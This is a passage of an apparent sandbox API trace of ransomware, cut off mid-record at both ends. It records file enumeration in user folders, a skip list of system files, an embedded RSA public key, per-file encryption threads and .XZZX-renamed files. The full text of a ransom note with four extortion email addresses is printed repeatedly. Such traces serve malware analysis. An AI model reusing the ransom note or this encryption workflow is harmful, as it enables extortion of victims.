9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1338 [0246.674] CloseHandle (hObject=0x1338) returned 1 [0246.674] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\*.*", lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0x3cded18 [0246.674] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM") returned="DqOPM" [0246.674] lstrcpyW (in: lpString1=0x179504, lpString2="DqOPM" | out: lpString1="DqOPM") returned="DqOPM" [0246.675] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0246.675] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0246.675] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="My Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents" [0246.675] SetErrorMode (uMode=0x1) returned 0x1 [0246.675] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents" [0246.675] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\" [0246.675] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\" [0246.675] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*" [0246.675] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0246.675] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0246.675] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents" [0246.675] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*" [0246.675] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="Desktop") returned 0x0 [0246.675] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="DESKTOP") returned 0x0 [0246.675] SetErrorMode (uMode=0x1) returned 0x1 [0246.675] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\_HELP_INSTRUCTION.TXT") returned 64 [0246.675] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0246.676] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0246.676] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x133c) returned 0x0 [0246.676] RegQueryValueExW (in: hKey=0x133c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43dd300, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43dd300*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0246.676] RegCloseKey (hKey=0x133c) returned 0x0 [0246.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0246.676] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0246.676] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x133c [0246.676] CloseHandle (hObject=0x133c) returned 1 [0246.676] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0246.676] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0246.677] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0246.677] lstrcmpW (lpString1="NetHood", lpString2="..") returned 1 [0246.677] lstrcmpW (lpString1="NetHood", lpString2=".") returned 1 [0246.677] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0246.677] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0246.677] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="NetHood" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood" [0246.677] SetErrorMode (uMode=0x1) returned 0x1 [0246.677] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood" [0246.677] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\" [0246.677] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\" [0246.677] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*" [0246.677] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0246.677] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0246.677] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood" [0246.677] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*" [0246.677] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="Desktop") returned 0x0 [0246.677] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="DESKTOP") returned 0x0 [0246.677] SetErrorMode (uMode=0x1) returned 0x1 [0246.677] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\_HELP_INSTRUCTION.TXT") returned 59 [0246.678] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0246.678] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0246.678] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x133c) returned 0x0 [0246.678] RegQueryValueExW (in: hKey=0x133c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43dd530, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43dd530*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0246.678] RegCloseKey (hKey=0x133c) returned 0x0 [0246.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0246.678] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0246.678] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\nethood\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x133c [0246.678] CloseHandle (hObject=0x133c) returned 1 [0246.678] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0246.678] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0246.679] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0246.679] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0246.679] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0246.679] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0246.679] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0246.679] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0246.679] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0246.679] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0246.679] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0246.679] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0246.679] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0246.679] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0246.679] SetErrorMode (uMode=0x1) returned 0x1 [0246.679] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0246.679] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0246.679] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0246.679] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" [0246.679] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0246.679] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="Pictures" [0246.679] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0246.680] StrStrW (lpFirst="1698FA38038EB2CD51213BC807C39715.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0246.680] StrStrW (lpFirst="1698FA38038EB2CD51213BC807C39715.XZZX", lpSrch="ntldr") returned 0x0 [0246.680] StrStrW (lpFirst="1698FA38038EB2CD51213BC807C39715.XZZX", lpSrch="NTLDR") returned 0x0 [0246.680] StrStrW (lpFirst="1698FA38038EB2CD51213BC807C39715.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0246.680] StrStrW (lpFirst="1698FA38038EB2CD51213BC807C39715.XZZX", lpSrch="ntdetect.com") returned 0x0 [0246.680] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0246.680] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0246.680] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0246.680] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0246.680] lstrcpyW (in: lpString1=0x17cf1c, lpString2="1698FA38038EB2CD51213BC807C39715.XZZX" | out: lpString1="1698FA38038EB2CD51213BC807C39715.XZZX") returned="1698FA38038EB2CD51213BC807C39715.XZZX" [0246.680] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0246.680] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1340 [0246.680] Sleep (dwMilliseconds=0x96) [0246.829] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0246.829] lstrcmpW (lpString1="1971D3BF09924C93CB17194F0DC730DB.XZZX", lpString2="..") returned 1 [0246.829] lstrcmpW (lpString1="1971D3BF09924C93CB17194F0DC730DB.XZZX", lpString2=".") returned 1 [0246.829] StrStrW (lpFirst="1971D3BF09924C93CB17194F0DC730DB.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0246.829] StrStrW (lpFirst="1971D3BF09924C93CB17194F0DC730DB.XZZX", lpSrch="ntldr") returned 0x0 [0246.829] StrStrW (lpFirst="1971D3BF09924C93CB17194F0DC730DB.XZZX", lpSrch="NTLDR") returned 0x0 [0246.829] StrStrW (lpFirst="1971D3BF09924C93CB17194F0DC730DB.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0246.829] StrStrW (lpFirst="1971D3BF09924C93CB17194F0DC730DB.XZZX", lpSrch="ntdetect.com") returned 0x0 [0246.829] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0246.829] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0246.829] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0246.829] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0246.829] lstrcpyW (in: lpString1=0x17cf1c, lpString2="1971D3BF09924C93CB17194F0DC730DB.XZZX" | out: lpString1="1971D3BF09924C93CB17194F0DC730DB.XZZX") returned="1971D3BF09924C93CB17194F0DC730DB.XZZX" [0246.829] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0246.829] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1344 [0246.830] Sleep (dwMilliseconds=0x96) [0246.984] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0246.984] lstrcmpW (lpString1="2187C5602F1ADAF08D4383D0333BBF38.XZZX", lpString2="..") returned 1 [0246.984] lstrcmpW (lpString1="2187C5602F1ADAF08D4383D0333BBF38.XZZX", lpString2=".") returned 1 [0246.984] StrStrW (lpFirst="2187C5602F1ADAF08D4383D0333BBF38.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0246.985] StrStrW (lpFirst="2187C5602F1ADAF08D4383D0333BBF38.XZZX", lpSrch="ntldr") returned 0x0 [0246.985] StrStrW (lpFirst="2187C5602F1ADAF08D4383D0333BBF38.XZZX", lpSrch="NTLDR") returned 0x0 [0246.985] StrStrW (lpFirst="2187C5602F1ADAF08D4383D0333BBF38.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0246.985] StrStrW (lpFirst="2187C5602F1ADAF08D4383D0333BBF38.XZZX", lpSrch="ntdetect.com") returned 0x0 [0246.985] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0246.985] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0246.985] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0246.985] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0246.985] lstrcpyW (in: lpString1=0x17cf1c, lpString2="2187C5602F1ADAF08D4383D0333BBF38.XZZX" | out: lpString1="2187C5602F1ADAF08D4383D0333BBF38.XZZX") returned="2187C5602F1ADAF08D4383D0333BBF38.XZZX" [0246.985] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0246.985] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1348 [0246.985] Sleep (dwMilliseconds=0x96) [0247.141] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0247.141] lstrcmpW (lpString1="3A2295CD2F8CD2DF95E7618733C2B727.XZZX", lpString2="..") returned 1 [0247.141] lstrcmpW (lpString1="3A2295CD2F8CD2DF95E7618733C2B727.XZZX", lpString2=".") returned 1 [0247.141] StrStrW (lpFirst="3A2295CD2F8CD2DF95E7618733C2B727.XZZX", 